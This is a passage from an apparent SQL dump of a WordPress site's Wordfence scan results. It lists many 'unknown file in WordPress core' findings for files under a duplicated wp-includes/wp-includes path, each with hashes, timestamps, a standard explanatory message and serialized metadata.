More</a>','a:5:{s:4:\"file\";s:81:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27538,1631424941,1631424941,'new','knownfile',75,'df28d8dd7d3810647097cadf41c81b07','6d40c25260f6abae7947541ec9976f3f','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27539,1631424941,1631424941,'new','knownfile',75,'0f2e4a97f2f2098dea74bf7272b1ff29','fa7136bd972c95463b7693c331034b28','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:80:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27540,1631424941,1631424941,'new','knownfile',75,'72bb5efbec7a2a7ab4e62514e7837a7f','10904225fbaeffdc30266c3feb2c31ad','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:83:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27541,1631424941,1631424941,'new','knownfile',75,'ea5159b9817553fc7c0fe1fa49dd0c51','b0d6d0735f1756fcde64696b59addb39','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:82:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27542,1631424941,1631424941,'new','knownfile',75,'5541218287b8c9c333fc0fb08845faa5','9e1fd2c4d7e8e4ccd71a857b971dd753','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27543,1631424941,1631424941,'new','knownfile',75,'e79bf589d1b16ec46701a495bb1850ef','6b1b817fa70d5fdcefd9a682a901f553','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27544,1631424941,1631424941,'new','knownfile',75,'fa14c6435e8b88431780175854f8bf4b','02e5462e441ca9c993e4d55fb86b060a','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27545,1631424941,1631424941,'new','knownfile',75,'da6db30d1bebb558fa37676b025e1f68','160a890a47d0da76d829b273d7075069','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27546,1631424941,1631424941,'new','knownfile',75,'552f151d11b75ee4c9a0d57b5c3e2a80','a1dee403181dd8236e80a76257f5e01f','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27547,1631424941,1631424941,'new','knownfile',75,'d436057eb28b42f6457a19d43f1076dd','91fd89071bc86b8bbf2759990da543a7','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27548,1631424941,1631424941,'new','knownfile',75,'3dd87f1408815d1855007cc206512bc0','a7519849e682840bd076cf87a7cb5641','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27549,1631424941,1631424941,'new','knownfile',75,'6ee53315c08fb9e8c509ac723993a77e','3abfcda9006c61ee7aa3b9cb0cf93a39','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27550,1631424941,1631424941,'new','knownfile',75,'81f073b84d2c3b41de36e11509a2cc2e','623e80da4e2963bef033444f6bd9c275','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:84:\"wp-includes/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27551,1631424941,1631424941,'new','knownfile',75,'68078dfcc823077d1d062fe4700e68fa','e269bd51cd82a9b6c3baec086ac85276','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27552,1631424942,1631424942,'new','knownfile',75,'47ee8f25d0e42be697ef770631f2c723','07894239b0022ce5b42ed1d8b70d4d1d','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/search/class-wp-rest-search-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/rest-api/search/class-wp-rest-search-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27553,1631424942,1631424942,'new','knownfile',75,'6996024a0c887b10948e356cfa361a98','62e7d9964f4f5aa0d4819ae07da6437e','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27554,1631424942,1631424942,'new','knownfile',75,'4030816089848c72fdbb83f27b52f8af','7e803dbe4119fb7cd7361d5fada8a867','Unknown file in WordPress core: wp-includes/wp-includes/rest-api.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/rest-api.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27555,1631424942,1631424942,'new','knownfile',75,'3db7ed28d9cdbbf9e196ebb1250aaa87','9c01f8c3161f19c5f69ce2d85f657f99','Unknown file in WordPress core: wp-includes/wp-includes/revision.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/revision.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27556,1631424942,1631424942,'new','knownfile',75,'14468f7f5a58018cdeaa98b7a1cc3e5b','29242a392d6499d2fe055d17de0a7849','Unknown file in WordPress core: wp-includes/wp-includes/rewrite.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/rewrite.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27557,1631424942,1631424942,'new','knownfile',75,'1f895770f774366b1ccf52afa97f05cb','04778a7a224b0c68636b79617769be91','Unknown file in WordPress core: wp-includes/wp-includes/robots-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/robots-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27558,1631424942,1631424942,'new','knownfile',75,'c22f8db0347c95500172c952560c65f8','0d410346f0931e75ac78273d524ef83c','Unknown file in WordPress core: wp-includes/wp-includes/rss-functions.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/rss-functions.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27559,1631424942,1631424942,'new','knownfile',75,'1ae4930f6ab94db03278ebebbedc9a7b','fece73927e72dd21ad4bf51bfd89d7c5','Unknown file in WordPress core: wp-includes/wp-includes/rss.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:31:\"wp-includes/wp-includes/rss.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27560,1631424942,1631424942,'new','knownfile',75,'01a842690447a7ca4419a962e3be3dbb','2f833cdf54d11fbfa3053f10c705b15e','Unknown file in WordPress core: wp-includes/wp-includes/script-loader.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/script-loader.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27561,1631424942,1631424942,'new','knownfile',75,'e3f876f6a51baeef641c6b83dc9de233','e171f5c57f9067cb7a9f37697991ca4f','Unknown file in WordPress core: wp-includes/wp-includes/session.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/session.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27562,1631424942,1631424942,'new','knownfile',75,'193c572d13ff71059ceba35fda188b1e','068ed399e4047ba287cf0dc054d0b078','Unknown file in WordPress core: wp-includes/wp-includes/shortcodes.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/shortcodes.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27563,1631424942,1631424942,'new','knownfile',75,'30c8e63b025a994ca2e2611aa541cca9','d30b085bd3d4b290ae1f6f1e15691393','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-index.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-index.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27564,1631424942,1631424942,'new','knownfile',75,'c32bedba06761478ddf8ff84a2fef259','b18b0fe65637f86ca0d95d64005c123e','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-provider.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-provider.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27565,1631424942,1631424942,'new','knownfile',75,'9444084b6f6bd750854591c96ab95ede','6255bba980e742bf9a747a1414208963','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27566,1631424943,1631424943,'new','knownfile',75,'3f3121fd3b4f20cfc488a4c8fbfa8899','1ed52d426cb977dfb51881de50bb1257','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-renderer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-renderer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27567,1631424943,1631424943,'new','knownfile',75,'42d55028e6ba7d7f8c41d836ce3a280c','1fcda2b7209bab4ce1c192b4f6564155','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27568,1631424943,1631424943,'new','knownfile',75,'3816ead09fe210f40dc9d478ca8744d5','d0e2dcefda6a6a19060736b15b9ada13','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27569,1631424943,1631424943,'new','knownfile',75,'e7571fc8612358f48feae34ef2a2dbc3','88e6c4e5a4452ae25150aaae2dc860d7','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27570,1631424943,1631424943,'new','knownfile',75,'585e3deac0b1afe5768ef075adfd518e','a47994685c75ad7c03a1b9ddb7c58ac3','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:75:\"wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27571,1631424943,1631424943,'new','knownfile',75,'bf960820c14e01e60a3219fa1284f5f3','a745eee7555ef8a3e9bee3faadc2b94d','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27572,1631424943,1631424943,'new','knownfile',75,'74464e2a8bcecd1700dec8723dd77ca4','39d94b220d9405d38651ba12055614d9','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/sitemaps.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27573,1631424943,1631424943,'new','knownfile',75,'80a02f995a7e74a874664a81a842c5ba','3dcd6d4f2f41fb23e2d13ff72f8d2ede','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/LICENSE','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/sodium_compat/LICENSE\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27574,1631424943,1631424943,'new','knownfile',75,'a916ec7764406b104063b96f5f7c0de7','0384da8fb6fd9aa6ee6631702c25acb2','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/autoload-php7.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/sodium_compat/autoload-php7.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27575,1631424943,1631424943,'new','knownfile',75,'367e2edb8d789932fd3d7ee3a8b82e86','f9407b4506fabe482ee00c2f66cdb51e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/autoload.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/sodium_compat/autoload.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27576,1631424943,1631424943,'new','knownfile',75,'bb384270f58c8acca50f1c6f26c8511a','1deefd53dd687bfd5edd56ced8dcfaa7','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/composer.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener 